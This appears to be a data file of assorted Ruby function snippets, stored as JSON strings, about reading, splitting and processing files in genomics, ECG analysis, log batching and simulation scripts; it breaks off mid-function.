"def by_line_length\n a = File.readlines(file_name)\n while b = a.shift\n puts b if b.length >= 250\n end\n end",
"def detect_segment_errors(segment, segment_start, segment_end) #collapse_start\n segment_length = segment.length\n averaged_segment = Array.new(segment_length)\n local_maxes = Array.new\n\n # Smooth the data by taking the averages\n for i in 0...segment_length\n if i == 0\n averaged_segment[i] = segment.slice(0,3).inject(:+).to_f / 3.0\n elsif i == 1\n averaged_segment[i] = segment.slice(0,4).inject(:+).to_f / 4.0\n elsif i == segment_length-1\n averaged_segment[i] = segment.slice(segment_length-3, 3).inject(:+).to_f / 3.0\n elsif i == segment_length-2\n averaged_segment[i] = segment.slice(segment_length-4, 4).inject(:+).to_f / 4.0\n else\n averaged_segment[i] = segment.slice(i-2, 4).inject(:+).to_f / 4.0\n end\n end\n\n # Find all the local maxes in the data, that can correspond to qrs segments or smaller local maxes\n j = 0\n while j < segment_length\n current = averaged_segment[j]\n local_max = true\n\n if (current - BASELINE_VALUE) > 20\n starting = [j-10, 0].max\n ending = [j+10, segment_length].min\n for k in starting...ending\n if averaged_segment[k] > current\n local_max = false\n break\n end\n end\n\n if local_max\n if (current - 512) > 250\n local_maxes.push({ index: j, type: 'qrs' })\n else\n local_maxes.push({ index: j, type: 'small' })\n end\n j += 10\n end\n end\n j += 1\n end\n\n distances = Array.new\n flutters = Array.new\n w = 0\n\n # Find the distances between qrs segments\n # Find the number of small local maxes in between qrs segments (corresponding to atrial flutters)\n while w < local_maxes.length - 1\n current = local_maxes[w]\n if current[:type] == 'qrs'\n idx = w+1\n counter = 0\n\n while idx < local_maxes.length\n if local_maxes[idx][:type] == 'qrs'\n distances.push({\n start: current[:index],\n stop: local_maxes[idx][:index],\n distance: local_maxes[idx][:index] - current[:index]\n })\n if counter >= 4\n flutters.push({\n start: current[:index],\n stop: local_maxes[idx][:index],\n distance: local_maxes[idx][:index] - current[:index]\n })\n end\n break;\n end\n\n counter += 1\n idx += 1\n end\n\n w = idx\n else\n w += 1\n end\n end\n\n max_distance = distances.present? ? distances.max_by { |obj| obj[:distance] }[:distance] : 0\n min_distance = distances.present? ? distances.min_by { |obj| obj[:distance] }[:distance] : 0\n long_distances = Array.new\n if max_distance - min_distance > 75\n long_distances = distances.select { |obj| obj[:distance] > max_distance-25 }\n long_distances = long_distances.reduce([]) do |memo, val|\n last = memo.last\n if last\n if last[:stop] == val[:start]\n last[:stop] = val[:stop]\n last[:distance] = last[:distance] + val[:distance]\n memo[-1] = last\n\n memo\n else\n memo.push(val)\n end\n else\n [val]\n end\n end\n end\n\n long_distances.each do |dist_obj|\n signal = segment.slice(dist_obj[:start], dist_obj[:distance])\n\n StreamAlert.create({\n signal: signal,\n start_time: Time.at(segment_start.to_f + dist_obj[:start]*MS_PER_SAMPLE/1000.0),\n end_time: Time.at(segment_start.to_f + dist_obj[:stop]*MS_PER_SAMPLE/1000.0),\n alert: 'Sinus Arrythmia',\n ecg_stream_id: self.id\n })\n end\n\n flutters.each do |flutter_obj|\n signal = segment.slice(flutter_obj[:start], flutter_obj[:distance])\n\n StreamAlert.create({\n signal: signal,\n start_time: Time.at(segment_start.to_f + flutter_obj[:start]*MS_PER_SAMPLE/1000.0),\n end_time: Time.at(segment_start.to_f + flutter_obj[:stop]*MS_PER_SAMPLE/1000.0),\n alert: 'Atrial Flutter',\n ecg_stream_id: self.id\n })\n end\n end",
"def find_to_bigs(levels=[\"0\"],up_to=300)\n\tarr,names = find_files(levels,up_to)\n\tto_bigs = []\n\t(0...arr.size).each do |i|\n\t\tFile.open(arr[i],\"r\"){|file|\n\t\t\tfile.each_line do |line|\n\t\t\t\tif (line.chomp == \"OUTPUT_TOO_BIG\")\n\t\t\t\t\tputs names[i]\n\t\t\t\t\tto_bigs << names[i]\n\t\t\t\tend\n\t\t\t\tbreak\n\t\t\tend\n\t\t}\n\tend\n\treturn to_bigs\nend",
"def fasta_with_lengths(fasta_fn)\n tmp_file = register_new_tempfile('positive_peaks_formatted.fa')\n File.open(fasta_fn){|f|\n f.each_line.slice_before(/^>/).each{|hdr, *lines|\n seq = lines.map(&:strip).join\n tmp_file.puts \"#{hdr.strip}:#{seq.size}\"\n tmp_file.puts seq\n }\n }\n tmp_file.close\n tmp_file.path\nend",
"def gen_input_files(fileprefix, nbr_files, nbr_floors, rate, max_time)\r\n nbr_files.times do |n|\r\n filename = fileprefix + (\"%.3d\" % n) + '.in'\r\n gen_input_file(filename, nbr_floors, rate, max_time)\r\n end\r\n end",
"def mm_allreads(cigarstring, samread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif samread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif samread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif samread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def 500_files(input)\n # naive solution is to flatten and sort\n\n \nend",
"def divide_to_slices(array, slice_count)\n slice_size = ((array.length.to_f / slice_count).ceil).to_i\n return array.each_slice(slice_size)\n end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def test_read_file_many_blocks\r\n hash_calc = Minitest::Mock.new('test_hash_calculator')\r\n block_checker = Minitest::Mock.new('test_block_checker')\r\n account_tracker = Minitest::Mock.new('account_tracker')\r\n def block_checker.read_next_line; \"1|2|3|4|5|6\"; end\r\n def block_checker.parse(string, char); [\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]; end\r\n output = \"Line 0: Too many '|' in the block '1|2|3|4|5|6'\"\r\n assert_equal output, @g.read_file(hash_calc, block_checker, account_tracker)\r\n end",
"def read_file (length_of_row, length_of_col, file_name)\n @row_max = length_of_row\n @col_max = length_of_col\n file = File.open(file_name, 'r')\n file.each_line do |line|\n line = line.strip.split(' ').map(&:to_i)\n @picture << line\n end\n self.labeling\n self.print_array(@picture)\n puts \"--------------------------------------\"\n self.print_array(@final_array)\n end",
"def read_file\n \t@readin = []\n file = File.open(@filename[@file_count], 'r')\n\t @readin = file.each.to_a\n\t # chop off the escaped characters (in this case: \\r\\n)\n @readin.map! {|s| s.chomp}\n # increment the file count\n @file_count += 1\n file.close\n # determine which file was read in\n # the files either have a \"W\" (for power) or \"Wh\" as the first line\n \tif @readin[0] =~ /Wh/\n \t\tparse_energy\n \telse @readin[0] =~ /W/\n \t\tparse_power\n \tend\n end",
"def get_record_blocks\n\n blocks = []\n current_block = nil\n\n File.readlines(@file).each do |l|\n\n # start of a new aragorn result\n if l =~ /^Location \\[(\\d+),(\\d+)\\]$/\n\n if current_block\n blocks << parse_block(current_block)\n current_block = []\n else \n current_block = Array.new\n end\n end\n\n if current_block\n current_block << l\n end \n\n end\n unless current_block.nil?\n blocks << parse_block(current_block)\n end\n\n return blocks\n end",
"def calculate_max_seqs\n file_summaries.map(&:seqs).max\n end",
"def findFastqFiles()\n @read1FileList = Dir[\"*_R1_*.fastq.gz\"]\n @read2FileList = Dir[\"*_R2_*.fastq.gz\"]\n\n if @read1FileList == nil || @read1FileList.length < 1\n raise \"Did not find any fastq files for read 1\"\n else\n @read1FileList.sort! # Sort all the filenames by segment number\n end\n\n if @mode.eql?(\"paired\") && (@read2FileList == nil || @read2FileList.length < 1) \n raise \"Did not find any fastq files for read 2 for paired-end mode\"\n end\n\n if @read2FileList != nil && @read2FileList.length >= 1\n @read2FileList.sort! # Sort the read 2 fastq filenames by segment number\n end\n end",
"def handle_bed_errors(bed_fn, bed_errors)\r\n nr_bases = bed_errors[0]\r\n bed_lines_size = bed_errors[1]\r\n bad_lines = bed_errors[2]\r\n \r\n rc = 0\r\n if bad_lines > 0 \r\n if bad_lines < bed_lines_size\r\n rc = 0\r\n flash.now[:notice] = 'WARNING: ' + bad_lines.to_s + ' invalid bed format lines found in file and ignored'\r\n else\r\n rc = -1\r\n flash[:error] = 'ERROR: No valid bed format lines found in file: ' + bed_fn\r\n end\r\n end\r\n \r\n if nr_bases > DesignQuery::MAX_BASES\r\n rc = -2\r\n flash[:error] = 'ERROR: Genomic space of ' + nr_bases.to_s + ' is too large - please limit to ' + DesignQuery::MAX_BASES\r\n elsif bed_lines_size > DesignQuery::MAX_BED_LINES\r\n rc = -3\r\n flash[:error] = \"ERROR: Too many lines in file - please limit to #{DesignQuery::MAX_BED_LINES} lines\"\r\n end\r\n return rc\r\n end",
"def createAvailable(split) \n start = CHUNKS*2+3\n available = []\n \n while(start < split.length)\n available.push split[start].chomp.to_i\n start += CHUNKS+1\n end\n return available\nend",
"def parse_file\n parsed_result_blocks = get_record_blocks\n\n gff_array = []\n if !parsed_result_blocks.empty?\n parsed_result_blocks.each do |b|\n gff_array << line_to_gff(b)\n end\n end\n return gff_array\n end",
"def ranges_of_offfsets_for_size(number_of_items, chunk_size)\n raise ArgumentError, \"Chunk size should be > 0, was #{chunk_size}\" unless chunk_size > 0\n split_range_into_subranges_of(range_for_size_of(number_of_items), chunk_size)\n end",
"def folding_ranges(filename); end",
"def open_fastq_sub_output_files\n return if @stats_only\n if @pass_sub_filename.nil? && @reject_sub_filename.nil?\n # no files open\n @pass_sub = nil\n @reject_sub = nil\n else\n # split the reads that passed and the reads that failed\n # the quality filter into separate files; if either one\n # of the file names was not specified then discard the\n # corresponding reads\n unless @pass_sub_filename.nil?\n STDERR.puts \"Opening #{make_temp_filename(@pass_sub_filename)} for subfile pass filter FASTQ output.\" if @verbose\n @pass_sub = open_fastq_output(make_temp_filename(@pass_sub_filename))\n end\n unless @reject_sub_filename.nil?\n STDERR.puts \"Opening #{make_temp_filename(@reject_sub_filename)} for subfile reject filter FASTQ output.\" if @verbose\n @reject_sub = open_fastq_output(make_temp_filename(@reject_sub_filename))\n end\n end\n end",
"def run_split(input_file, prefix, o={})\n result = get_split_files(input_file, prefix)\n if result.size > 0\n puts \"[run_split] result exists. skipping...\"\n return result\n end\n o[:suf_len] ||= 5\n if o[:k]\n o[:line_bytes] = (File.size(input_file) / o[:k].to_f).to_i\n o[:suf_len] = Math.log10(o[:k]).ceil\n end\n #split argument\n arg = if o[:line_bytes]\n \"-C #{o[:line_bytes]}\"\n elsif o[:lines]\n \"-l #{o[:lines]}\"\n end\n log = `split #{arg} -d -a #{o[:suf_len]} #{input_file} #{prefix}`\n if log.scan(/[a-z]/).size > 0\n puts \"[run_split] error[#{log}]\"\n return nil\n end\n get_split_files(input_file, prefix)\nend",
"def split_array(array, number)\n size = number\n \nend",
"def split_data_into_files(datafile)\n datafiles = []\n output = NIL\n File.open(datafile) do |file| \n counter = 1 \n something_was_written = FALSE\n while line = file.gets \n # parse lines and break into different files at #\n if( line.match( /^\\s*Model/ ) )\n if (something_was_written && output) \n output.close\n output = NIL\n end\n something_was_written = FALSE\n else \n if (!something_was_written) \n outputfile_name = datafile.gsub(/\\.txt/, \"-\" + counter.to_s + \".functionfile.txt\")\n counter +=1\n output = File.open(outputfile_name, \"w\") \n datafiles.push(outputfile_name)\n end\n # check if line matches @n_nodes digits\n if (line.match( /^\\s*f\\d*/) )\n output.puts line\n something_was_written = TRUE\n end\n end\n end \n file.close\n if (output) \n output.close\n end\n end\n datafiles\nend",
"def split_data_into_files(datafile)\n datafiles = []\n output = NIL\n File.open(datafile) do |file| \n counter = 1 \n something_was_written = FALSE\n while line = file.gets \n # parse lines and break into different files at #\n if( line.match( /^\\s*Model/ ) )\n if (something_was_written && output) \n output.close\n output = NIL\n end\n something_was_written = FALSE\n else \n if (!something_was_written) \n outputfile_name = datafile.gsub(/\\.txt/, \"-\" + counter.to_s + \".functionfile.txt\")\n counter +=1\n output = File.open(outputfile_name, \"w\") \n datafiles.push(outputfile_name)\n end\n # check if line matches @n_nodes digits\n if (line.match( /^\\s*f\\d*/) )\n output.puts line\n something_was_written = TRUE\n end\n end\n end \n file.close\n if (output) \n output.close\n end\n end\n datafiles\nend",
"def readWeights\n\ti=0\n\tFile.open(RISKS).each_line { |line|\n\t\tns = line.split\n\t\t@risks[ns[0]] = ns[1].to_i\n\t\ti = i+1\n\t}\n\tFile.open(SYS_FUN).each_line { |line|\n\t\tns = line.split\n\t\t@frisk[ns[0]] = ns[1].to_i\n\t\ti = i+1\n\t}\n\treturn i\nend",
"def read_array_fields(cls, io_offset, length, signature)\n @io.seek io_offset # Move to the field data\n @io.read_bytes TYPE_SIZES_MAP[signature] * length\n end",
"def generate_failure_lines(array_file_content)\n array_details = Array.new\n array_get = false\n index = 0\n array_file_content.each do |line|\n index += 1 if array_get and line.match(Regexp.new(\"#{index + 2}\\\\)\"))\n array_get = true if line.match(Regexp.new(\"#{index + 1}\\\\)\"))\n if array_get and line.match(/assertions/).nil?\n array_details[index] = Array.new if array_details[index].nil?\n next if array_details[index].length == 0 and line.match(/[0-9]\\)/).nil?\n array_details[index] << line\n end\n end\n (0..index).to_a.each do |arr_index|\n html_details, array_details = generate_failure_or_error_line(array_details, arr_index)\n end\n html_details\n end",
"def slices(num_slices)\n array_of_slices = []\n each_slice(length / num_slices) { |s| array_of_slices << s }\n array_of_slices\n end",
"def each\n with_separate_read_io do | iterable |\n reading_lens = Obuf::Lens.new(iterable)\n @size.times { yield(reading_lens.recover_object) }\n end\n end",
"def validate_stats\n seq_total = @seq_stats[\"Total Reads\"].to_i\n seq_pf = @seq_stats[\"Post-Filter Reads\"].to_i\n die \"seq_stats_file: missing total\" if @seq_stats[\"Total Reads\"].nil?\n die \"seq_stats_file: missing post-filter read count\" if @seq_stats[\"Post-Filter Reads\"].nil?\n die(\"seq_stats_file: #{seq_pf} post-filter reads > \" +\n \"#{seq_total} total reads\") if seq_pf > seq_total\n\n # check mapped-read statistics\n if @barcodes.empty? && (@eland || @bwa)\n mapper_pf = @mapper_pf_stats[\"Total Reads\"].to_i\n die(\"#{seq_pf} post-filter reads != \" +\n \"#{mapper_pf} mapped post-filter reads\") if seq_pf != mapper_pf\n if not @no_rejects\n mapper_reject = @mapper_reject_stats[\"Total Reads\"].to_i\n mapper_total = mapper_pf + mapper_reject\n die(\"#{seq_total} sequenced reads != #{mapper_total} mapped reads\") if\n seq_total != mapper_total\n end\n end\n\n # check barcode statistics\n #if !@barcodes.empty?\n # barcode_pf = count_and_validate_barcodes(:post_filter, :mapper_pf_stats)\n # die(\"#{seq_pf} post-filter reads != \" +\n # \"#{barcode_pf} barcoded post-filter reads\") if seq_pf != barcode_pf\n # if not @no_rejects\n # barcode_reject = count_and_validate_barcodes(:rejected, :mapper_reject_stats)\n # barcode_total = barcode_pf + barcode_reject\n # die(\"#{seq_total} sequenced reads != #{barcode_total} barcoded reads\") if\n # seq_total != barcode_total\n # end\n #end\n end",
"def get_lines\n lines = []\n read_file.each_line{|l| lines << l.chomp }\n @total_lines = lines.shift.to_i\n lines\n end",
"def split() File.split(@path).map {|f| self.class.new(f) } end",
"def split_into_parts(*sizes); end",
"def read_singletons(singletons, read_length)\n\t\tsingle_reads = {}\n\t\t\n\t\tFile.open(singletons, 'r').readlines.each do |line|\n \n \t\tline = line.strip.split(/\\s+/)\n \t\tqname, flag, chr, start = line[0..3] \t\n \t\tflag.to_i & 0x10 > 0 ? strand = -1 : strand = 1\n \t\tcigar = line[5]\n\t\t\tdistance = genomic_mappinglength(cigar, read_length)\n\t\t\t\n\t\t\tif distance != false\n\t\t\t\tstrand == 1 ? stop = start + distance : stop = start - distance\n\t\t\t\tsingle_reads[qname] = [chr, start, stop, strand]\n\t\t\tend\n\t\tend\n\t\tsingle_reads\n\tend",
"def readArray(hadError)\n if (hadError != nil)\n hadError[0] = false\n end\n arrayList = Array.new\n endMarker = Array.new\n endMarker[0] = false\n while true\n newString = readString(endMarker, hadError)\n if (newString == nil)\n if (hadError != nil) \n hadError[0] = true\n end\n break\n end\n if (endMarker[0])\n break\n end\n arrayList << newString\n end\n return arrayList\n end",
"def process_file(offset = 0)\n batch = Array.new\n idx = 0\n IO.readlines(@logfile).each do |line|\n if (idx += 1) <= offset\n next\n end\n\n m = line.match(@regex)\n if !m\n $stderr.puts \"Dropping logline '#{line}' because it does not match the parsing regex: #{@regex}\"\n next\n end\n\n if batch.size >= @batch_size\n enqueue_batch(batch.dup)\n batch.clear()\n end\n\n batch.push(m)\n end\n\n if batch.size > 0\n enqueue_batch(batch)\n end\n\n return idx\n end",
"def read_file_to_arr(path)\n ret = []\n File.open(path, \"r\") do |f|\n f.each_line do |line|\n ret << line.split(\" \").map { |s| s.to_i}\n end\n end\n return ret\nend",
"def read_multi(names)\n names.map do |name|\n read(name)\n end\n end",
"def array_statistics(files_array)\n file_count = 0; line_count = 0; loc_count = 0;\n \n files_array.collect {|f| file_statistics(f)}.each do |stats|\n file_count += 1\n line_count += stats[:line_count]\n loc_count += stats[:loc_count]\n end\n \n {\n :file_count => file_count,\n :line_count => line_count,\n :loc_count => loc_count,\n :class_length => file_count == 0 ? 0 : loc_count / file_count\n }\n end",
"def runMulFrSeq(filename)\n\t\tfiles=[]\n\t\tbegin\n\t\t\tfile = File.open(filename)\n\t\trescue\n\t\t\t$stderr.printf \"%scannot open file '%s' for reading!\\n\",$err,filename\n\t\t\texit 1\n\t\tend\n\n\t\tstartNewFile=true\n\t\toldFile=tmpf=nil\n\t\twhile line=file.gets\n\n\t\t\t# ---- only whitespace in the line?\n\t\t\tif line.split(\" \").length<1\n\t\t\t\tstartNewFile=true\n\t\t\telse\n\t\t\t\tif startNewFile\n\t\t\t\t\toldFile.flush if oldFile\n\t\t\t\t\ttmpf=oldFile=Tempfile.new(\"eplot\")\n\t\t\t\t\tfiles.push(tmpf)\n\t\t\t\t\tstartNewFile=false\n\t\t\t\tend\n\t\t\t\ttmpf.puts line\n\t\t\tend\n\t\tend\n\t\tif tmpf\n\t\t\ttmpf.flush\n\t\telse\n\t\t\t$stderr.printf \"%sFile '%s' is empty!\\n\",$err,filename\n\t\t\texit 1\n\t\tend\n\t\tfile.close\n\n\t\t# ---- Call it as if we had multiple files\n\t\tremoveDummyTitles(files.length)\n\t\trunMulFrMulOpenedFiles(files)\n\t\tfiles.each { |f| f.close }\n\tend",
"def parse_files(options)\n files = options.files\n files = [\".\"] if files.empty?\n\n file_list = normalized_file_list(options, files, true, options.exclude)\n\n return [] if file_list.empty?\n\n jobs = SizedQueue.new(number_of_threads * 3)\n workers = []\n file_info = []\n file_info_lock = Mutex.new\n\n Thread.abort_on_exception = true\n @stats = Stats.new(file_list.size, options.verbosity)\n @stats.begin_adding(number_of_threads)\n\n # Create worker threads.\n number_of_threads.times do\n thread = Thread.new do\n while (filename = jobs.pop)\n @stats.add_file(filename)\n content = read_file_contents(filename)\n top_level = ::RDoc::TopLevel.new filename\n\n parser = ::RDoc::Parser.for(top_level, filename, content, options,\n @stats)\n result = parser.scan\n\n file_info_lock.synchronize do\n file_info << result\n end\n end\n end\n workers << thread\n end\n\n # Feed filenames to the parser worker threads...\n file_list.each do |filename|\n jobs << filename\n end\n workers.size.times do\n jobs << nil\n end\n\n # ...and wait until they're done.\n workers.each do |thread|\n thread.join\n end\n\n @stats.done_adding\n\n file_info\n end",
"def get_total_time_list(filename)\n to_return = []\n lines = File.open(filename, \"rb\") {|f| f.read.split(/\\n+/)}\n lines.each do |line|\n kernel_start = 0.0\n kernel_end = 0.0\n # The lines we're interested in shouldn't contain any letters, just numbers\n next if line =~ /[a-zA-Z]/\n values = line.split.map {|v| v.to_f}\n to_return << [values[0], values[3]]\n end\n to_return\nend",
"def parse_remaining_files; end",
"def split_refseq\n # prepare output files\n system(%Q[cut -f4 #{$prepare_dir}/refseq_genes_result.tsv | cut -c1-5 | sort | uniq > #{$prepare_dir}/refp_prefix_list.txt ]) # get exist prefix list of protein_id\n FileUtils.mkdir_p(\"#{$prepare_dir}/refp\") unless File.exist?(\"#{$prepare_dir}/refp\")\n refp_output = {}\n File.open(\"#{$prepare_dir}/refp_prefix_list.txt\") do |f|\n f.each_line do |line|\n prefix = line.chomp.strip\n refp_output[prefix] = File.open(\"#{$prepare_dir}/refp/#{prefix}.dat\", \"w\")\n end\n end\n refp_output[\"no_protein_id\"] = File.open(\"#{$prepare_dir}/refp/no_protein_id.dat\", \"w\") # protein_id is optional\n\n File.open(\"#{$prepare_dir}/refseq_genes_result.tsv\") do |f|\n f.each_line do |line|\n columns = line.chomp.strip.split(\"\\t\")\n prefix = (columns[3].nil? || columns[3] == \"\") ? \"no_protein_id\" : columns[3][0..4] # protein_id is optional\n refp_output[prefix].puts line.chomp.strip\n end\n end\n refp_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def getFileReports(array)\n\t\t\thashes = array\n\t\t\t# Get multiple file reports\n\t\t\ti = 0\n\t\t\thashes = hashes.uniq\n\t\t\twhile i < hashes.size\n\t\t\t\t4.times do\n\t\t\t\t\tif hashes == nil\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse\n\t\t\t\t\t\tputs \"[*] Fetching file report for #{hashes[i].slice(0)} (#{i+1}/#{hashes.size})\"\n\t\t\t\t\t\thashes[i] << VirusTotal.new.get_file_report(hashes[i].slice(0))\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\t\ti += 1\n\t\t\tend\n\t\t\tif i >= (hashes.size - 4)\n\t\t\t\tputs \"[*] Skipping 4.times loop, i am all done..\"\n\t\t\t\treturn hashes\n\t\t\telse\n\t\t\t\tputs \"[*] Sleeping 65 seconds.\"\n\t\t\t\tsleep(65)\n\t\t\tend\n\t\tend",
"def read_multi(*names); end",
"def split_by_size(chunk, size)\n chunk.each_slice(size).to_a\n end",
"def read_dta_files(fh, num_files, unpack_35)\n dta_files = Array.new(num_files)\n start = dta_start_byte\n fh.pos = start\n\n header.num_dta_files.times do |i|\n dta_files[i] = Mspire::Sequest::Srf::Dta.from_io(fh, unpack_35) \n end\n dta_files\n end",
"def readFormants(file)\n f1, f2 = [], []\n\n fs = []\n\n File.open(file, \"r\") do |f|\n # 9 useless lines\n 9.times { f.gets }\n while !f.eof?\n #Each block starts with the number of formants found\n f.gets\n how_many = f.gets.to_i\n #We are only interested in the first two formants\n f1 = f.gets.to_f\n f.gets\n f2 = f.gets.to_f\n (1+(how_many-2)*2).times { f.gets}\n fs << [f1,f2]\n end\n end\n\n fs\nend",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def read(start: 0, num: 10)\n f = open(@filename, 'r')\n # Iterate to start line\n start.times { f.gets }\n \n # Read lines start to last\n data = ''\n num.times {\n chunk = f.gets\n data << chunk unless chunk.nil?\n }\n \n f.close()\n return data\n end",
"def q1_read_to_array(data_file_name)\r\n array2d = []\r\n \r\n read_file(\"data/\"+data_file_name).each{ |line|\r\n array1d = line.split(\",\").map(&:strip).map(&:to_s)\r\n array2d << array1d\r\n }\r\n return array2d\r\nend",
"def read_blocks(start_block, block_count, nonce)\n data = @disk.read_blocks start_block + @data_start, block_count\n hmacs = (0...block_count).map do |i|\n load_data = @tree_driver.load_leaf start_block + i\n load_data[:ops] <<\n { :op => :sign, :line => load_data[:line], :session_id => @sid,\n :nonce => nonce, :data => data[i * block_size, block_size],\n :block => start_block + i }\n add_tree_data_to_ops load_data[:ops]\n response = @fpga.perform_ops load_data[:ops]\n @tree_driver.perform_ops load_data[:ops]\n response.first\n end\n { :data => data, :hmacs => hmacs }\n end",
"def add_result_raw_reads(base, _opts)\n return nil unless result_files_exist?(base, '.1.fastq')\n r = MiGA::Result.new(\"#{base}.json\")\n add_files_to_ds_result(r, name,\n ( result_files_exist?(base, '.2.fastq') ?\n {pair1: '.1.fastq', pair2: '.2.fastq'} :\n {single: '.1.fastq'} ))\n end",
"def records_array(lines)\n lines.map { |line| collect_line(line) }.select { |rate| rate[:rate_type] == :list }\n end",
"def mm_selreads(cigarstring, selread, posdiff)\n\t\tcount = 0\n\t\tcigarstring.split(\",\").each do |cig|\n\t\t\tcigar = Cigar.find_by(id: cig)\n\t\t\tif selread.key?(cigar.read_id.to_s) == true\n\t\t\t\tplayerpos = cigar.pos.to_i + posdiff\n\t\t\t\tif selread[cigar.read_id.to_s][:cigar] != cigar.data.to_s\n\t\t\t\t\tcount = count + 1\n\t\t\t\telsif selread[cigar.read_id.to_s][:bwapos].to_i != playerpos\n\t\t\t\t\tcount = count + 1\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\treturn count\n\tend",
"def parse_barcode_seq_stats(stats_filename)\n @barcodes.each {|bcinfo| bcinfo[:seq_stats] = Hash.new}\n STDERR.puts \"Reading barcode stats file #{stats_filename}\" if @verbose\n parse_barcode_stats_file(stats_filename)\n @barcodes.each do |bcinfo|\n bcinfo[:seq_stats][\"Total Reads\"] =\n bcinfo[:seq_stats][\"Post-Filter Reads\"].to_i +\n bcinfo[:seq_stats][\"Failed Reads\"].to_i\n end\n end",
"def read_file\n match_file = File.new(\"matches.txt\", \"r\")\n no_of_match = match_file.gets\n if no_of_match != nil\n for i in 0..no_of_match.to_i - 1\n match_result = match_file.gets\n @matchesarr << match_result\n end\n end\n match_file.close\n end",
"def readFiles\n rError = nil\n\n if (File.exists?(@TasksFileName))\n @LstTasks = nil\n File.open(@TasksFileName, 'r') do |iFile|\n @LstTasks = iFile.readlines.map do |iLine|\n next iLine.strip\n end\n end\n if (File.exists?(@TicketsFileName))\n @LstTickets = nil\n File.open(@TicketsFileName, 'r') do |iFile|\n @LstTickets = iFile.readlines.map do |iLine|\n next iLine.strip\n end\n end\n else\n rError = MissingTicketsFileError.new(\"Missing Tickets file: #{@TicketsFileName}\")\n end\n else\n rError = MissingTasksFileError.new(\"Missing Tasks file: #{@TasksFileName}\")\n end\n\n return rError\n end",
"def lines\n total = 0\n chunk { |measurement|\n total += measurement.length + DELIMITER.length * 2\n total / max\n }.map { |_, line|\n [source, line].join(DELIMITER)\n }\n end",
"def split(max_size = 100000, overlap = 0)\n \tsub_slices = Array.new\n i = 0\n \tself.start.step(self.length, max_size - overlap - 1) do |i|\n sub_slices.push(self.sub_slice(i, i + max_size - 1))\n end\n \ti -= (overlap + 1)\n sub_slices.push(self.sub_slice(i + max_size))\n \treturn sub_slices\n end",
"def classify(reads, within, support_reads, support_clip_length)\n read_groups = grouping_reads(reads, within, support_reads, support_reads)\n clips = [] # without SID reads\n non_clips = []\n\n read_groups.each do |read_group|\n if read_group.all? { |read| read.type == :B || read.type == :F }\n clips << read_group.sort\n else\n non_clips << read_group.sort\n end\n end\n non_clips.uniq!\n return clips, non_clips\n end",
"def read_uint_array_by_size(size, count)\n count.times.map { read_uint_by_size(size) }\n end",
"def batches(batch_size:, cursor:)\n @csv.lazy\n .each_slice(batch_size)\n .with_index\n .drop(count_of_processed_rows(cursor))\n .to_enum { (count_of_rows_in_file.to_f / batch_size).ceil }\n end",
"def chunks(chunk_size = DEFAULT_CHUNK_SIZE)\n raise 'Block required' unless block_given?\n\n raw = source_file.read\n\n range_end = lambda do |max|\n val = max > raw.length ? raw.length : max\n val - 1\n end\n\n range = 0..range_end.call(chunk_size)\n\n loop do\n yield raw[range]\n break if range.last + 1 == raw.length\n first = range.last + 1\n last = range_end.call(range.last + chunk_size)\n range = first..last\n end\n end",
"def calculate_total_seqs\n file_summaries.sum(&:seqs)\n end",
"def find_files(levels=[\"0\"],up_to=300)\n\tarr = []\n\tnames = []\n\t(0...up_to).each do |i|\n\t\tlevels.each do |j|\n\t\t\tif (File.exists?(\"../scraper_and_data/scraped_genomes/level_\" + j + \"/\"+i.to_s))\n\t\t\t\tarr << \"../scraper_and_data/scraped_genomes/level_\" + j + \"/\"+i.to_s\n\t\t\t\tnames << i.to_s\n\t\t\tend\n\t\tend\n\tend\n\treturn arr,names\nend",
"def sc_recorders(file_base, interval, limit)\n recs = []\n\n # Real power loss recorders\n loss_types = {\n 'overhead_line' => 'OHL',\n 'underground_line' => 'UGL',\n 'triplex_line' => 'TPL',\n 'transformer' => 'TFR'\n }\n loss_types.each do |ltype, abbrev|\n # Only set up recorders for classes that actually exist in the feeder\n # (Specifically, R3_1247_2 doesn't have any triplex_lines,\n # and trying to record on class=triplex_line crashes GridLAB-D)\n if @lines.detect {|line| line.is_a?(GLMObject) && line[:class] == ltype}\n recs << new_obj({\n class: 'collector',\n group: \"\\\"class=#{ltype}\\\"\",\n property: 'sum(power_losses.real),sum(power_losses.imag)',\n interval: interval,\n limit: limit,\n file: file_base + abbrev + '_losses.csv'\n })\n end\n end\n\n # Aging_Transformer loss of life and replacements\n # All we really care about is these values at the end of the run,\n # so we'll only collect them once a day to save space\n xfmr_props = {\n 'percent_loss_of_life' => 'pct_lol',\n 'transformer_replacement_count' => 'replacements'\n }\n xfmr_props.each do |prop, abbrev|\n recs << new_obj({\n class: 'group_recorder',\n group: \"\\\"groupid=#{AGING_GROUPID}\\\"\",\n property: prop,\n interval: DAY_INTERVAL,\n limit: limit,\n file: file_base + 'xfmr_' + abbrev + '.csv'\n })\n end\n\n # Also collect power profiles for 